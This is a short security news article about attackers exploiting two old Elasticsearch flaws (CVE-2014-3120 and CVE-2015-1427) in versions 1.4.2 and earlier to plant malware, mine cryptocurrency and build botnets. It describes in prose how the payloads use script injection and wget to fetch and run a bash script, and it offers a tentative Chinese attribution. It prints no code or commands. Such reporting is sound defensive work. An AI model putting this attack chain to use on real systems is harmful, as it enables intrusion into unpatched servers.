Elasticsearch versions 1.4.2 and earlier vulnerable to malware infections

Two old vulnerabilities were exploited, allegedly by Chinese hackers

The Cisco network security and ethical hacking teams recently detected intrusions from malicious hackers by targeting Elasticsearch clusters to exploit previously reported vulnerabilities to perform various malicious actions such as malware injection and cryptocurrency mining, reported experts from the International Institute of Cyber Security.

“Hackers are attacking users in versions 1.4.2 and earlier,” the network security experts mentioned, after posting a report of the activity detected by a honeypot.

Given the techniques of attack used, experts believe that this group of hackers could be originating in China. In the attack were exploited two vulnerabilities discovered in the years 2014 and 2015, used to pass scripts to the search queries, which allowed OS hackers to access the older computers and deploy the payload. Elasticsearch 1.4.2 was released at the end of 2014.

“The 2014 vulnerability (CVE-2014-3120) allows attackers to execute arbitrary MVEL expressions, while the 2015 vulnerability (CVE-2015-1427) allows hackers to bypass sandbox environments to run arbitrary shell commands through a complex script,” network security experts mention.

Security teams added: “The first payload delivered invokes wget to download a bash script, while the second uses a confusing JavaScript to invoke bash and download the same script with wget. This is probably an attempt to make the exploit functional on multiple platforms.”

A Cisco official reported some of the incidents caused by this attack: “We have encountered cases of denial-of-service (DoS) attacks, cryptocurrency mining, and attempts to integrate compromised systems to botnets”.

Although the experts did not explicitly attribute the attack to Chinese hacker groups, in their report they specified that the numerical identifier of an account of the Chinese social network QQ was seen in one of the commands executed by one of the payloads of the attack.

“We analyzed the public account activity of 952135763 and found several posts related to cybersecurity and exploiting vulnerabilities, although we found nothing related to this particular attack. Although these details could provide information to find the hackers responsible for the attack, we do not yet have enough information to know the attackers,” the experts concluded.